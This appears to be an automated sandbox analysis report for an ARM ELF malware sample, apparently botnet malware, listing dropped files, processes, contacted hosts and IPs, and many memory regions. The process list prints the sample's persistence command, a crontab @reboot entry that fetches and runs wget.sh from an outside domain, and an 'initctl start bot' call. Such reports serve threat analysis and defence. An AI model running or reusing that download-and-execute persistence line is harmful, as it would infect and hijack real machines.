Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm7.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/root/.bashrc
|
ASCII text
|
dropped
|
||
/var/spool/cron/crontabs/tmp.hGK4g5
|
ASCII text
|
dropped
|
||
/etc/init/bot.conf
|
ASCII text
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/cat
|
cat /tmp/tmp.slrTgTVxmA
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/head
|
head -n 10
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/tr
|
tr -d \\000-\\011\\013\\014\\016-\\037
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/cut
|
cut -c -80
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/cat
|
cat /tmp/tmp.slrTgTVxmA
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/head
|
head -n 10
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/tr
|
tr -d \\000-\\011\\013\\014\\016-\\037
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/cut
|
cut -c -80
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI
|
||
/tmp/arm7.elf
|
/tmp/arm7.elf
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh;
chmod 777 wget.sh; ./wget.sh\") | crontab -"
|
||
/bin/sh
|
-
|
||
/bin/sh
|
-
|
||
/usr/bin/crontab
|
crontab -l
|
||
/bin/sh
|
-
|
||
/usr/bin/crontab
|
crontab -
|
||
/tmp/arm7.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "/sbin/initctl start bot"
|
||
/bin/sh
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
||
/tmp/arm7.elf
|
-
|
There are 26 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://hailcocks.ru/wget.sh;
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
kingstonwikkerink.dyn
|
185.82.200.181
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
213.182.204.57
|
unknown
|
Latvia
|
||
88.151.195.22
|
unknown
|
Azerbaijan
|
||
109.202.202.202
|
unknown
|
Switzerland
|
||
91.189.91.43
|
unknown
|
United Kingdom
|
||
91.189.91.42
|
unknown
|
United Kingdom
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
558f01e22000
|
page read and write
|
|||
7fd7a07b4000
|
page read and write
|
|||
7fd79feaa000
|
page read and write
|
|||
7fd698038000
|
page read and write
|
|||
7fff4bab8000
|
page read and write
|
|||
7fd7a07f9000
|
page read and write
|
|||
7fd7a0667000
|
page read and write
|
|||
558f01e2b000
|
page read and write
|
|||
7fd698030000
|
page execute read
|
|||
558f03e40000
|
page read and write
|
|||
7fd798021000
|
page read and write
|
|||
7fd7a07b4000
|
page read and write
|
|||
7fff4badc000
|
page execute read
|
|||
7fd698040000
|
page read and write
|
|||
7fd7a0486000
|
page read and write
|
|||
558f03e29000
|
page execute and read and write
|
|||
7fd7a0790000
|
page read and write
|
|||
558f01e2b000
|
page read and write
|
|||
7fd7a0486000
|
page read and write
|
|||
7fff4badc000
|
page execute read
|
|||
7fd7a0115000
|
page read and write
|
|||
7fd7a02a4000
|
page read and write
|
|||
7fd698038000
|
page read and write
|
|||
558f05928000
|
page read and write
|
|||
7fd797fff000
|
page read and write
|
|||
7fd79fb48000
|
page read and write
|
|||
7fd7a0115000
|
page read and write
|
|||
7fd7a0138000
|
page read and write
|
|||
7fd79feaa000
|
page read and write
|
|||
7fd7a07b4000
|
page read and write
|
|||
7fd79fb48000
|
page read and write
|
|||
7fd7a0790000
|
page read and write
|
|||
7fd698040000
|
page read and write
|
|||
558f01bd1000
|
page execute read
|
|||
7fd7a07b4000
|
page read and write
|
|||
7fff4bab8000
|
page read and write
|
|||
7fd79fab6000
|
page read and write
|
|||
558f03e29000
|
page execute and read and write
|
|||
7fd7a0790000
|
page read and write
|
|||
7fd7a02a4000
|
page read and write
|
|||
558f01e2b000
|
page read and write
|
|||
7fd798021000
|
page read and write
|
|||
7fff4badc000
|
page execute read
|
|||
7fd7a0115000
|
page read and write
|
|||
7fd7a0486000
|
page read and write
|
|||
558f05928000
|
page read and write
|
|||
7fd798021000
|
page read and write
|
|||
7fd79f2ae000
|
page read and write
|
|||
558f03e40000
|
page read and write
|
|||
7fd7a07f9000
|
page read and write
|
|||
7fd79f2ae000
|
page read and write
|
|||
7fd79fb48000
|
page read and write
|
|||
7fff4bab8000
|
page read and write
|
|||
7fd7a0138000
|
page read and write
|
|||
7fd7a0667000
|
page read and write
|
|||
7fd797fff000
|
page read and write
|
|||
7fd698030000
|
page execute read
|
|||
7fd798021000
|
page read and write
|
|||
7fd7a02a4000
|
page read and write
|
|||
7fd79f2ae000
|
page read and write
|
|||
7fd698040000
|
page read and write
|
|||
558f05928000
|
page read and write
|
|||
7fd79fab6000
|
page read and write
|
|||
7fd797fff000
|
page read and write
|
|||
558f03e29000
|
page execute and read and write
|
|||
558f01bd1000
|
page execute read
|
|||
7fd698038000
|
page read and write
|
|||
7fd7a0486000
|
page read and write
|
|||
558f01bd1000
|
page execute read
|
|||
7fd79feaa000
|
page read and write
|
|||
558f03e40000
|
page read and write
|
|||
7fd79fab6000
|
page read and write
|
|||
7fd698030000
|
page execute read
|
|||
7fd698041000
|
page read and write
|
|||
7fd7a0790000
|
page read and write
|
|||
7fd797fff000
|
page read and write
|
|||
7fd7a07f9000
|
page read and write
|
|||
7fd7a07f9000
|
page read and write
|
|||
558f01e2b000
|
page read and write
|
|||
558f01e22000
|
page read and write
|
|||
7fd7a0138000
|
page read and write
|
|||
558f05928000
|
page read and write
|
|||
7fd7a02a4000
|
page read and write
|
|||
7fd7a0667000
|
page read and write
|
|||
7fd79fab6000
|
page read and write
|
|||
558f01e22000
|
page read and write
|
|||
7fd79feaa000
|
page read and write
|
|||
7fff4bab8000
|
page read and write
|
|||
558f03e40000
|
page read and write
|
|||
7fd698030000
|
page execute read
|
|||
558f03e29000
|
page execute and read and write
|
|||
7fd7a0115000
|
page read and write
|
|||
7fd7a0138000
|
page read and write
|
|||
558f01bd1000
|
page execute read
|
|||
558f01e22000
|
page read and write
|
|||
7fd698038000
|
page read and write
|
|||
7fd7a0667000
|
page read and write
|
|||
7fff4badc000
|
page execute read
|
|||
7fd698040000
|
page read and write
|
|||
7fd79f2ae000
|
page read and write
|
|||
7fd79fb48000
|
page read and write
|
There are 91 hidden memdumps, click here to show them.